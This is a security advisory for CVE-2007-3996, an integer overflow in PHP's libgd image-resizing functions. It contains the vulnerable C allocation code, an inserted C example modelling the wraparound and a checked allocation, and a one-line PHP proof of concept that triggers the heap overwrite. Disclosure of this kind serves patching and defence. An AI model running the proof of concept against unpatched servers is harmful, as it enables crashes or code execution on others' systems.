PHP ImageCopyResized/ImageCopyResampled Integer Overflow

Affected Products:
<= PHP 5.2.3

Authors:
Mattias Bengtsson <mattias@secweb.se>
Philip Olausson <po@secweb.se>

Reported:
2007-06-05

Released:
2007-08-30

CVE:
CVE-2007-3996

Issue:

Two integer overflows exist in PHP's bundled implementation of libgd. Remote exploitation of these overflows may, under some circumstances, allow execution of arbitrary code.

Description:

PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. libgd is used for dynamic creation of images.

Details:

The overflow is located in the function gdImageCopyResized(), which is used internally by PHP and can also be reached from PHP scripts via imagecopyresized() or imagecopyresampled().

...

/* sizeof(int) * srcW and sizeof(int) * srcH are computed without an overflow check;
   a large srcW or srcH wraps the product and yields an undersized buffer */
stx = (int *) gdMalloc (sizeof (int) * srcW);
sty = (int *) gdMalloc (sizeof (int) * srcH);

...

/* the loops still iterate srcW and srcH times, writing past the wrapped allocation */
for (i = 0; (i < srcW); i++) {
	stx[i] = dstW * (i+1) / srcW - dstW * i / srcW ;
}
for (i = 0; (i < srcH); i++) {
	sty[i] = dstH * (i+1) / srcH - dstH * i / srcH ;
}

...

Passing a high value of srcW or srcH results in an integer overflow when computing the allocation size for stx and sty, so the buffers are far smaller than the loops expect. The for-loops that follow the allocation then write a large amount of data past the end of the buffers, which results in a crash or possible execution of arbitrary code.

If a web application uses this function to resize images that can be uploaded remotely, the overflow can be triggered by a specially crafted image file.
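As an added illustration (not code from the advisory, from libgd or from PHP), the following C program models the size computation from the snippet above with a fixed 32-bit size type, so the wraparound is reproducible on any host, and shows the overflow check that a patched allocation path needs before calling the allocator. The function names and the 32-bit size model are assumptions made for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Added example: models sizeof(int) * srcW as a 32-bit build computes it.
 * Names (unchecked_alloc_size, checked_alloc_size, alloc_int_table,
 * bytes_written_past_buffer) are assumptions, not libgd/PHP identifiers. */

/* Unchecked size computation: the product is truncated to 32 bits,
 * exactly as a 32-bit size_t would wrap. */
uint32_t unchecked_alloc_size(int elem_size, int count)
{
    return (uint32_t)((uint64_t)elem_size * (uint64_t)count);
}

/* Overflow-aware variant: returns 1 and stores the byte count when
 * elem_size * count fits in 32 bits, 0 on overflow or a bad count. */
int checked_alloc_size(int elem_size, int count, uint32_t *out)
{
    if (count < 0 || elem_size <= 0)
        return 0;
    uint64_t product = (uint64_t)elem_size * (uint64_t)count;
    if (product > UINT32_MAX)
        return 0;
    *out = (uint32_t)product;
    return 1;
}

/* Guarded allocation: refuses (NULL) instead of handing back an
 * undersized buffer that a later loop would overrun. */
int *alloc_int_table(int count)
{
    uint32_t bytes;
    if (!checked_alloc_size((int)sizeof(int), count, &bytes))
        return NULL;
    return (int *)malloc(bytes);
}

/* Simulates the allocate-then-fill pattern of the vulnerable code: the
 * loop writes srcW ints no matter how many bytes were allocated.
 * Returns how many bytes the loop would write beyond the buffer. */
uint64_t bytes_written_past_buffer(int srcW)
{
    uint32_t allocated = unchecked_alloc_size((int)sizeof(int), srcW);
    uint64_t written = (uint64_t)sizeof(int) * (uint64_t)srcW;
    return written > allocated ? written - allocated : 0;
}

int main(void)
{
    /* Constructed sample widths: the advisory's 0x7fffffff and a benign 120. */
    int widths[] = { 0x7fffffff, 120 };
    for (int i = 0; i < 2; i++) {
        uint32_t bytes = 0;
        int ok = checked_alloc_size((int)sizeof(int), widths[i], &bytes);
        printf("srcW=%d unchecked=%u checked=%s overrun=%llu bytes\n",
               widths[i], unchecked_alloc_size((int)sizeof(int), widths[i]),
               ok ? "ok" : "overflow",
               (unsigned long long)bytes_written_past_buffer(widths[i]));
    }
    return 0;
}
```

With srcW = 0x7fffffff the unchecked product wraps to 0xFFFFFFFC while the loop would write 8 GiB, so the checked path must reject the request rather than allocate; the same check applied to srcH covers the second overflow.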

Proof of Concept:

<?php

imagecopyresized(imagecreatetruecolor(0x7fffffff, 120),
                imagecreatetruecolor(120, 120),
                0, 0, 0, 0, 0x7fffffff, 120, 120, 120);

?>

Impact:

Because this vulnerability can be triggered remotely, the impact should be considered high.

Solution:

Upgrade to PHP 5.2.4